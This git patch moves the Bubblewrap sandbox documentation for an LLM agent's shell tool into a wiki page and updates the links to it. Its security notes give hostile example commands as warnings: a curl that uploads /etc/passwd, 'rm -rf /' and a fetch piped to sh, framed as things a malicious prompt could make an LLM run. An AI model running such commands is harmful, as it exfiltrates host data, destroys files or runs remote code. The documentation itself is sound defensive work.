From 0948b7548d2fa867ca5a8f6210d00e8ec0cc8d54 Mon Sep 17 00:00:00 2001 From: Sewer56 Date: Sat, 25 Apr 2026 15:07:07 +0100 Subject: [PATCH] Changed: Consolidate sandbox docs into wiki, remove root SANDBOX-PROFILES.md - Move detailed mount tables, env vars, rationale, and AllowedPathResolver security note into new docs/src/extra-sandboxing-notes.md - Trim sandboxing.md: replace duplicate under-the-hood section with links to extra-sandboxing-notes.md - Delete root SANDBOX-PROFILES.md (single source of truth is now the wiki) - Update all 7 stale SANDBOX-PROFILES.md references across READMEs, ARCHITECTURE.md, and Rust doc comments to point to published wiki URLs - Add Extra Sandboxing Notes to mkdocs.yml nav under Extra section --- README.MD | 2 +- SANDBOX-PROFILES.md | 301 ------------------- docs/mkdocs.yml | 2 + docs/src/extra-sandboxing-notes.md | 167 ++++++++++ docs/src/sandboxing.md | 36 +-- src/reloaded-code-bubblewrap/ARCHITECTURE.md | 2 +- src/reloaded-code-bubblewrap/README.md | 2 +- src/reloaded-code-core/README.md | 2 +- src/reloaded-code-core/src/path/allowed.rs | 2 +- src/reloaded-code-core/src/tools/bash/mod.rs | 2 +- src/reloaded-code-serdesai/README.md | 2 +- src/reloaded-code-serdesai/src/tools/bash.rs | 2 +- 12 files changed, 189 insertions(+), 333 deletions(-) delete mode 100644 SANDBOX-PROFILES.md create mode 100644 docs/src/extra-sandboxing-notes.md diff --git a/README.MD b/README.MD index 199a558..198ea86 100644 --- a/README.MD +++ b/README.MD @@ -149,7 +149,7 @@ cargo run --example serdesai-task -p reloaded-code-serdesai - [reloaded-code-serdesai README](./src/reloaded-code-serdesai/README.md) - [reloaded-code-bubblewrap README](./src/reloaded-code-bubblewrap/README.md) - [reloaded-code-models-dev README](./src/reloaded-code-models-dev/README.md) -- [Sandbox profiles and operator checklist](./SANDBOX-PROFILES.md) +- [Sandbox profiles and operator checklist](https://reloaded-project.github.io/ReloadedCode/extra_sandboxing_notes/) - [API Reference (docs.rs)](https://docs.rs/reloaded-code-core) ## Contributing diff --git a/SANDBOX-PROFILES.md b/SANDBOX-PROFILES.md deleted file mode 100644 index 23ecca8..0000000 --- a/SANDBOX-PROFILES.md +++ /dev/null @@ -1,301 +0,0 @@ -# Linux Sandbox Profiles - -This guide covers the Bubblewrap-based Linux sandboxing provided by -`reloaded-code-bubblewrap` when the `linux-bubblewrap` feature is enabled. - -## Why Sandboxing Matters - -When an LLM runs shell commands, it can do anything the underlying process -is allowed to do: read secrets, delete files, make network requests to -exfiltrate data, and more. - -Sandboxing puts the shell inside an isolated filesystem so that only the -paths you explicitly allow are visible, and network access can be turned -off entirely. This is enforced by the kernel. - -This system is built on [bubblewrap][bwrap], a lightweight sandboxing tool -that uses Linux kernel namespaces. It is enabled via the `linux-bubblewrap` -Cargo feature flag and requires a Linux host with `bwrap` installed. - -**Important:** the sandbox never silently falls back to host execution. If -`bwrap` is missing or unusable, you get an explicit error instead. - -## The Two Profiles - -There are two preset profiles, each designed for a different trust level. - -### Public Bot - -Use this profile when the LLM is handling **untrusted or hostile input**, -for example a Discord bot or any scenario where you don't fully trust the -prompts being sent. - -Key characteristics: - -- **Network disabled.** No outbound connections at all. -- **Minimal filesystem.** Starts from an empty view of the filesystem. - Only selected system runtime roots, a writable workspace, and a synthetic - home are visible. -- **Synthetic home.** A dedicated directory replaces the real home, so - `~/.ssh` and other credential directories are never accessible. -- **Environment scrubbed.** All inherited variables are cleared and only - a sanitized system `PATH` and `HOME` are set. -- **Resolved host shell.** Commands run via a visible system `bash` or - fallback `sh`, not a home-directory or temp `PATH` entry. - -### Trusted Maintenance - -Use this profile for **trusted automation** like CI/CD pipelines, build -jobs, maintenance tasks, and similar workloads where you control the -inputs. - -Key characteristics: - -- **Network enabled.** -- **Full host `/` visible (read-only).** -- **Narrowed writable areas:** only the workspace, a synthetic home, a - cache root, and a configurable sandbox `/tmp` backing. -- **`/etc/shadow` hidden** by a memory overlay. -- **Credential mounts** via `with_credential_file_mounts`, with validation - that destinations stay within allowed directories. - -> **Security warning:** this profile is not safe for untrusted input. -> Network access remains available and the full host filesystem is -> readable. For example, a malicious prompt could trick the LLM into -> running `curl https://example.com --upload-file /etc/passwd` to -> exfiltrate host data, or use `ip addr` to reveal your network -> configuration. Use this profile only for trusted inputs. - -### Quick Comparison - -| Aspect | Public Bot | Trusted Maintenance | -| ---------------------- | ---------------------------------------------- | ----------------------------------------------------- | -| **Use case** | Untrusted / hostile input | Trusted automation (CI/CD, builds, etc.) | -| **Network** | Disabled (`--unshare-net`) | Enabled | -| **Host filesystem** | Minimal (bins, libs, workspace) | Full `/` read-only | -| **Writable paths** | Workspace, synthetic home, configurable `/tmp` | Workspace, synthetic home, cache, configurable `/tmp` | -| **Home directory** | Synthetic only | Synthetic + `/home` tmpfs overlay | -| **`/etc` visible** | No | Yes (except `/etc/shadow` tmpfs overlay) | -| **Environment** | Cleared, sanitized system `PATH` + `HOME` | Cleared, sanitized host `PATH` + XDG/build vars | -| **Credential mounts** | Not supported | Supported (validated destinations) | -| **Cache root** | Not mounted | Optional writable bind | -| **Shell** | Visible system `bash`/`sh` | Visible system `bash`/`sh` | -| **Safe for untrusted** | Yes | No | - -## How Sandboxing Works - -The sandbox starts from an **empty filesystem view**. Nothing from the host -is visible unless explicitly mounted in. This section explains the -mechanics. - -### Mount Types - -Bubblewrap provides several ways to bring paths into the sandbox: - -| Type | Flag | Effect | -| -------------- | ----------- | -------------------------------------------------------------- | -| Read-only bind | `--ro-bind` | Read-only access to a host path | -| Writable bind | `--bind` | Read-write access to a host path | -| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | -| Symlink | `--symlink` | Creates a symlink inside the sandbox | - -### Environment Isolation - -The sandbox clears all inherited environment variables with `--clearenv`, -then rebuilds the environment using only explicitly allowed variables via -`--setenv`. This prevents secrets that might be in the parent process from -leaking into the sandbox. - -### Network Isolation - -The `--unshare-net` flag removes all network access inside the sandbox by -placing it in its own network namespace with no network interfaces. This -is used by the Public Bot profile and is a kernel-level isolation, not -just a firewall rule. - -### Process Lifecycle - -- `--die-with-parent`: the sandboxed process is killed if the parent - process exits -- `--new-session`: creates a new process session for clean signal handling -- Configurable timeouts with buffered output preservation on kill - -### LLM Awareness - -When the sandbox has network disabled, the system prompt tells the LLM that -network access is unavailable, so it can adjust its behavior accordingly. - -## Profile Details - -### Public Bot - -#### Mounts - -| Path | Type | Purpose | -| ----------------------------------------- | --------------------- | --------------------------------------------------------- | -| Selected system runtime roots (see below) | `--ro-bind` | Common system shells, binaries, and libraries (read-only) | -| `/dev` | `--dev` | Device files (minimal set) | -| `/proc` | `--proc` | Process filesystem | -| `/tmp` | `--tmpfs` or `--bind` | Temporary files; RAM-backed or caller-managed host dir | -| `/workspace` | `--bind` | Working directory (writable) | -| `/home/sandbox` | `--bind` | Synthetic home (writable) | -| `/bin`, `/lib`, `/sbin` (when needed) | `--symlink` | Compatibility links into mounted system roots | - -System runtime roots are selected from the following paths when present: - -- `/usr/bin`, `/usr/lib`, `/lib64` -- `/run/current-system/sw` ([NixOS]) -- `/nix/store`, `/nix/var/nix/profiles/default` ([Nix]) - -#### Environment - -| Variable | Value | -| -------- | ------------------------------------------------------------------------------------------------------------- | -| `PATH` | Sanitized system `PATH` derived from the host; excludes home, temp, wrapper, and per-user profile directories | -| `HOME` | `/home/sandbox` | - -#### Network - -Disabled (`--unshare-net`). - -#### Cache Root - -Not mounted. A cache root is an optional host directory for storing build -artifacts and other reusable data between sandbox runs. The Public Bot -profile intentionally leaves it out so nothing persists across sessions. - -#### Why These Mounts - -- **System runtime roots**: mounted read-only so the resolved host shell - plus common distro/[Nix] binaries remain available without exposing the - full host root. -- **`/dev`, `/proc`, sandbox `/tmp`**: provide the minimum runtime surface - for common tools. -- **Real home directory hidden**: prevents accidental secret disclosure - from `~/.ssh` and similar directories. -- **`/etc` omitted**: avoids host-configuration coupling and credential - exposure (no `/etc/passwd` visible). -- **Inherited env cleared**: prevents credential leakage through - environment variables. -- **User-specific and volatile roots hidden**: minimizes attack surface - and information disclosure while still allowing common system binaries. - -Note: Commands that rely on paths like `/etc/alternatives`, `/opt`, or -per-user profile bins may still need explicit extra mounts. - -### Trusted Maintenance - -#### Mounts - -| Path | Type | Purpose | -| ------------------------ | --------------------- | ----------------------------------------------------- | -| `/` | `--ro-bind` | Entire host `/` (read-only) | -| `/home` | `--tmpfs` | Writable overlay (shadows real home) | -| `/etc/shadow` | `--tmpfs` | Shadowed (prevents password hash exposure) | -| `/workspace` | `--bind` | Working directory (writable) | -| `/home/sandbox` | `--bind` | Synthetic home (writable) | -| `/cache` (if configured) | `--bind` | Cache root (writable) | -| `/dev` | `--dev` | Device files | -| `/proc` | `--proc` | Process filesystem | -| `/tmp` | `--tmpfs` or `--bind` | Temporary files on RAM or caller-managed host storage | - -#### Environment - -| Variable | Value | -| ----------------- | ---------------------------------------------------------- | -| `PATH` | Sanitized host `PATH` with hidden/volatile entries removed | -| `HOME` | `/home/sandbox` | -| `TMPDIR` | `/tmp` (matches the configured sandbox tmp backing) | -| `XDG_CACHE_HOME` | `{cache_root}/xdg-cache` | -| `XDG_CONFIG_HOME` | `/home/sandbox/.config` | -| `XDG_STATE_HOME` | `{cache_root}/xdg-state` | - -#### Network - -Enabled by default. - -#### Why These Mounts - -- **Read-only host `/`**: keeps existing toolchains usable without - rebinding every distro-specific path. -- **Writable state narrowed**: synthetic home, workspace, cache root, and - memory overlays provide necessary write locations without exposing - arbitrary host paths. -- **`/etc/shadow` shadowed**: password hashes are not exposed even though - the rest of `/etc` remains visible for compatibility. -- **XDG directories set**: build tools use cache and state directories - without polluting the synthetic home. - -## Security Notes - -### AllowedPathResolver Is Not a Shell Sandbox - -[`AllowedPathResolver`][apr] only constrains structured file tools -(`read`, `write`, `edit`, `glob`, `grep`). It does **not** make shell -execution safe. - -When the `bash` tool is enabled: - -- An LLM can run arbitrary shell commands -- Commands can read, write, or delete any file the process has OS-level - permissions for -- Examples: `cat /etc/passwd`, `rm -rf /`, - `curl https://example.invalid/install.sh | sh` - -If your threat model includes shell execution, use the Linux `bwrap` -sandbox profiles documented here, or disable shell execution entirely. - -### Anti-Patterns to Avoid - -These patterns weaken sandbox isolation: - -- **Real home bind**: mounting the actual home directory exposes SSH keys - and other secrets -- **Full credential-store mounts**: mounting `~/.ssh`, - `~/.config/gcloud`, etc. defeats isolation -- **SSH agent forwarding**: socket forwarding bypasses filesystem - restrictions entirely -- **Broad writable host roots**: writable binds to `/opt`, `/var`, etc. - increase blast radius -- **Unnecessary env passthrough**: inheriting secrets via environment - variables can leak them even with `--clearenv` - -### Best Practices - -For reproducibility and isolation: - -1. **Use a synthetic home** (e.g., `/tmp/sandbox-home-{job-id}`) rather - than the real home directory -2. **Mount cache roots explicitly** for build artifacts that should persist - between runs -3. **Set `XDG_CACHE_HOME` and `XDG_STATE_HOME`** to cache-appropriate - locations inside the sandbox - -## Pre-Deployment Checklist - -Before going into production, verify the following on your target host. -The library handles things like synthetic home setup, environment -scrubbing, and visible system-shell resolution for you. These checks cover what -depends on your environment. - -### Host - -- [ ] `bwrap` is installed and on `PATH` -- [ ] Kernel user namespaces are available (check - `sysctl kernel.unprivileged_userns_clone` if applicable) - -### Public Bot - -- [ ] No outbound network connections are possible -- [ ] No host credentials are accessible inside the sandbox -- [ ] Writes outside the workspace go to tmpfs, not the host - -### Trusted Maintenance - -- [ ] Cache and build output directories work correctly on your host -- [ ] No unintended host paths are writable from inside the sandbox - -[bwrap]: https://github.com/containers/bubblewrap -[apr]: https://docs.rs/reloaded-code-core/latest/reloaded_code_core/struct.AllowedPathResolver.html -[NixOS]: https://nixos.org -[Nix]: https://nixos.org diff --git a/docs/mkdocs.yml b/docs/mkdocs.yml index 4597699..8e07e10 100755 --- a/docs/mkdocs.yml +++ b/docs/mkdocs.yml @@ -78,3 +78,5 @@ nav: - Comparison: comparison.md - Migration: migration.md - Custom Framework Integration: guides/custom-framework.md + - Extra: + - Extra Sandboxing Notes: extra-sandboxing-notes.md diff --git a/docs/src/extra-sandboxing-notes.md b/docs/src/extra-sandboxing-notes.md new file mode 100644 index 0000000..37e02c5 --- /dev/null +++ b/docs/src/extra-sandboxing-notes.md @@ -0,0 +1,167 @@ +# Extra Sandboxing Notes + +Detailed mount tables, environment variables, and design rationale for the two +built-in sandbox profiles. For profile descriptions, comparison, and setup +instructions, see [Sandboxing](sandboxing.md). + +## Profile details + +### Public Bot + +#### Mounts + +| Path | Type | Purpose | +| ----------------------------------------- | --------------------- | --------------------------------------------------------- | +| Selected system runtime roots (see below) | `--ro-bind` | Common system shells, binaries, and libraries (read-only) | +| `/dev` | `--dev` | Device files (minimal set) | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files; RAM-backed or caller-managed host dir | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/bin`, `/lib`, `/sbin` (when needed) | `--symlink` | Compatibility links into mounted system roots | + +System runtime roots are selected from the following paths when present: + +- `/usr/bin`, `/usr/lib`, `/lib64` +- `/run/current-system/sw` ([NixOS]) +- `/nix/store`, `/nix/var/nix/profiles/default` ([Nix]) + +#### Environment + +| Variable | Value | +| -------- | ------------------------------------------------------------------------------------------------------------- | +| `PATH` | Sanitized system `PATH` derived from the host; excludes home, temp, wrapper, and per-user profile directories | +| `HOME` | `/home/sandbox` | + +#### Network + +Disabled (`--unshare-net`). + +#### Cache root + +Not mounted. A cache root is an optional host directory for storing build +artifacts and other reusable data between sandbox runs. The Public Bot profile +intentionally leaves it out so nothing persists across sessions. + +#### Why these mounts + +- **System runtime roots**: mounted read-only so the resolved host shell plus + common distro/[Nix] binaries remain available without exposing the full host + root. +- **`/dev`, `/proc`, sandbox `/tmp`**: provide the minimum runtime surface for + common tools. +- **Real home directory hidden**: prevents accidental secret disclosure from + `~/.ssh` and similar directories. +- **`/etc` omitted**: avoids host-configuration coupling and credential + exposure (no `/etc/passwd` visible). +- **Inherited env cleared**: prevents credential leakage through environment + variables. +- **User-specific and volatile roots hidden**: minimizes attack surface and + information disclosure while still allowing common system binaries. + +!!! note "Commands that need extra mounts" + + Commands that rely on paths like `/etc/alternatives`, `/opt`, or per-user + profile bins may still need explicit extra mounts. + +### Trusted Maintenance + +#### Mounts + +| Path | Type | Purpose | +| ------------------------ | --------------------- | ----------------------------------------------------- | +| `/` | `--ro-bind` | Entire host `/` (read-only) | +| `/home` | `--tmpfs` | Writable overlay (shadows real home) | +| `/etc/shadow` | `--tmpfs` | Shadowed (prevents password hash exposure) | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/cache` (if configured) | `--bind` | Cache root (writable) | +| `/dev` | `--dev` | Device files | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files on RAM or caller-managed host storage | + +#### Environment + +| Variable | Value | +| ----------------- | ---------------------------------------------------------- | +| `PATH` | Sanitized host `PATH` with hidden/volatile entries removed | +| `HOME` | `/home/sandbox` | +| `TMPDIR` | `/tmp` (matches the configured sandbox tmp backing) | +| `XDG_CACHE_HOME` | `{cache_root}/xdg-cache` | +| `XDG_CONFIG_HOME` | `/home/sandbox/.config` | +| `XDG_STATE_HOME` | `{cache_root}/xdg-state` | + +#### Network + +Enabled by default. + +#### Why these mounts + +- **Read-only host `/`**: keeps existing toolchains usable without rebinding + every distro-specific path. +- **Writable state narrowed**: synthetic home, workspace, cache root, and + memory overlays provide necessary write locations without exposing arbitrary + host paths. +- **`/etc/shadow` shadowed**: password hashes are not exposed even though the + rest of `/etc` remains visible for compatibility. +- **XDG directories set**: build tools use cache and state directories without + polluting the synthetic home. + +## Under the hood + +### Mount types + +| Type | Flag | Effect | +| -------------- | ----------- | -------------------------------------------------------------- | +| Read-only bind | `--ro-bind` | Read-only access to a host path | +| Writable bind | `--bind` | Read-write access to a host path | +| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | +| Symlink | `--symlink` | Creates a symlink inside the sandbox | + +### Environment isolation + +The sandbox clears all inherited environment variables with `--clearenv`, +then rebuilds the environment using only explicitly allowed variables via +`--setenv`. This prevents secrets that might be in the parent process from +leaking into the sandbox. + +### Network isolation + +The `--unshare-net` flag removes all network access inside the sandbox by +placing it in its own network namespace with no network interfaces. This is +a kernel-level isolation, not just a firewall rule. + +### Process lifecycle + +- `--die-with-parent`: the sandboxed process is killed if the parent process + exits +- `--new-session`: creates a new process session for clean signal handling +- Configurable timeouts with buffered output preservation on kill + +### LLM awareness + +When the sandbox has network disabled, the system prompt tells the LLM that +network access is unavailable, so it can adjust its behavior accordingly. + +## Security notes + +### AllowedPathResolver is not a shell sandbox + +[`AllowedPathResolver`][apr] only constrains structured file tools +(`read`, `write`, `edit`, `glob`, `grep`). It does **not** make shell +execution safe. + +When the `bash` tool is enabled: + +- An LLM can run arbitrary shell commands +- Commands can read, write, or delete any file the process has OS-level + permissions for +- Examples: `cat /etc/passwd`, `rm -rf /`, + `curl https://example.invalid/install.sh | sh` + +If your threat model includes shell execution, use the Linux `bwrap` +sandbox profiles documented here, or disable shell execution entirely. + +[apr]: https://docs.rs/reloaded-code-core/latest/reloaded_code_core/struct.AllowedPathResolver.html +[NixOS]: https://nixos.org +[Nix]: https://nixos.org diff --git a/docs/src/sandboxing.md b/docs/src/sandboxing.md index fcae157..6927736 100644 --- a/docs/src/sandboxing.md +++ b/docs/src/sandboxing.md @@ -229,6 +229,9 @@ network exfiltration, credential theft, and host filesystem writes. - Commands run via the system `bash` or `sh` (resolved from mounted system paths) +See [Profile Reference](extra-sandboxing-notes.md#public-bot) for the full +mount table, environment variables, and design rationale. + #### Trusted Maintenance For **trusted automation** - CI/CD pipelines, build jobs, maintenance tasks @@ -248,6 +251,9 @@ contained to limit blast radius from accidental damage. - Selective bind-mounts of credential directories (e.g. `~/.ssh`, `~/.config/gcloud`) into the sandbox, with validated mount destinations +See [Profile Reference](extra-sandboxing-notes.md#trusted-maintenance) for the +full mount table, environment variables, and design rationale. + !!! danger "Trusted Maintenance is not safe for untrusted input" Network access remains available and the full host filesystem is readable. @@ -267,32 +273,14 @@ contained to limit blast radius from accidental damage. | Credential mounts | Not supported | Supported (validated) | | Safe for untrusted | **Yes** | **No** | -### Under the hood: mounts, environment, and network - -The sandbox starts from an empty filesystem view. The sandbox exposes nothing -from the host unless you mount it. - -**Mount types:** - -| Type | Flag | Effect | -| -------------- | ----------- | -------------------------------------------------------------- | -| Read-only bind | `--ro-bind` | Read-only access to a host path | -| Writable bind | `--bind` | Read-write access to a host path | -| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | -| Symlink | `--symlink` | Creates a symlink inside the sandbox | - -**Environment isolation:** The sandbox clears all inherited variables -(`--clearenv`), then sets only explicitly allowed ones (`--setenv`). - -**Network isolation:** `--unshare-net` places the sandbox in its own network -namespace with no interfaces. This is kernel-level, not a firewall rule. +### Under the hood -**Process lifecycle:** `--die-with-parent` kills the sandboxed process if the -parent exits. `--new-session` creates a clean process session for signal -handling. +The sandbox starts from an empty filesystem view. Nothing from the host is +visible unless explicitly mounted in. The kernel enforces filesystem, network, +and process isolation — this is not a userspace restriction. -**LLM awareness:** When the sandbox disables network access, the system prompt -tells the LLM that network is unavailable, so it adjusts its behaviour. +For the full mount-type reference, per-profile mount and environment tables, +and design rationale, see [Profile Reference](extra-sandboxing-notes.md). ## Security best practices diff --git a/src/reloaded-code-bubblewrap/ARCHITECTURE.md b/src/reloaded-code-bubblewrap/ARCHITECTURE.md index 622a193..d54ac72 100644 --- a/src/reloaded-code-bubblewrap/ARCHITECTURE.md +++ b/src/reloaded-code-bubblewrap/ARCHITECTURE.md @@ -3,7 +3,7 @@ Linux-only library that builds [bubblewrap] sandbox profiles, probes host capabilities, and produces wrapped command lines. -For the security model, see [SANDBOX-PROFILES.md](../../SANDBOX-PROFILES.md). +For the security model, see [Extra Sandboxing Notes](https://reloaded-project.github.io/ReloadedCode/extra-sandboxing-notes/). ## File Map diff --git a/src/reloaded-code-bubblewrap/README.md b/src/reloaded-code-bubblewrap/README.md index 0a2ea60..e92b08f 100644 --- a/src/reloaded-code-bubblewrap/README.md +++ b/src/reloaded-code-bubblewrap/README.md @@ -140,7 +140,7 @@ per-user profile directories from the inherited `PATH`. still drops entries under directories hidden by the profile. For more details on sandbox profiles and trade-offs, see -[SANDBOX-PROFILES.md](https://github.com/Reloaded-Project/ReloadedCode/blob/main/SANDBOX-PROFILES.md). +[Extra Sandboxing Notes](https://reloaded-project.github.io/ReloadedCode/extra_sandboxing_notes/). ## Builder Lists diff --git a/src/reloaded-code-core/README.md b/src/reloaded-code-core/README.md index 030c977..54b33b6 100644 --- a/src/reloaded-code-core/README.md +++ b/src/reloaded-code-core/README.md @@ -137,7 +137,7 @@ Two profiles are available: We default to the **Public Bot** profile when sandboxing is enabled. In either case, evaluate whether the chosen profile fits your security needs. -See [SANDBOX-PROFILES.md](https://github.com/Reloaded-Project/ReloadedCode/blob/main/SANDBOX-PROFILES.md) for the full operator +See [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/sandboxing/) for the full operator guide and checklist. ### Context and wrapper mapping diff --git a/src/reloaded-code-core/src/path/allowed.rs b/src/reloaded-code-core/src/path/allowed.rs index 23b7487..4e5a942 100644 --- a/src/reloaded-code-core/src/path/allowed.rs +++ b/src/reloaded-code-core/src/path/allowed.rs @@ -55,7 +55,7 @@ use std::sync::Arc; /// /// This resolver only restricts the structured file operations (`read`, `write`, `edit`, /// `glob`, `grep`). It does not make shell execution safe. -/// See `SANDBOX-PROFILES.md` for details on sandboxing on Linux. +/// See the [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/sandboxing/) for details on sandboxing on Linux. #[derive(Debug, Clone)] pub struct AllowedPathResolver { /// Canonicalized allowed base directories. diff --git a/src/reloaded-code-core/src/tools/bash/mod.rs b/src/reloaded-code-core/src/tools/bash/mod.rs index 211283d..db9f8e3 100644 --- a/src/reloaded-code-core/src/tools/bash/mod.rs +++ b/src/reloaded-code-core/src/tools/bash/mod.rs @@ -23,7 +23,7 @@ doc = "- `Builder::trusted_maintenance` for trusted jobs (network enabled, read-only host rootfs)." )] //! -//! See +//! See //! for the full operator guide. //! //! # Errors diff --git a/src/reloaded-code-serdesai/README.md b/src/reloaded-code-serdesai/README.md index 3ee9e49..a5b6862 100644 --- a/src/reloaded-code-serdesai/README.md +++ b/src/reloaded-code-serdesai/README.md @@ -186,7 +186,7 @@ We default to **Public Bot** profile when sandboxing is used. In either case, trusted or not, please evaluate whether the solution fits your security needs. I can make no guarantees. -More info in [SANDBOX-PROFILES.md](https://github.com/Reloaded-Project/ReloadedCode/blob/main/SANDBOX-PROFILES.md). +More info in [Sandboxing docs](https://reloaded-project.github.io/ReloadedCode/sandboxing/). ## Examples diff --git a/src/reloaded-code-serdesai/src/tools/bash.rs b/src/reloaded-code-serdesai/src/tools/bash.rs index 96d45d4..8a352cb 100644 --- a/src/reloaded-code-serdesai/src/tools/bash.rs +++ b/src/reloaded-code-serdesai/src/tools/bash.rs @@ -20,7 +20,7 @@ looser sandbox for build automation. Not safe against hostile commands.\n\ \n\ See the workspace guide at \ - \ + \ for full profile configuration and setup instructions." )]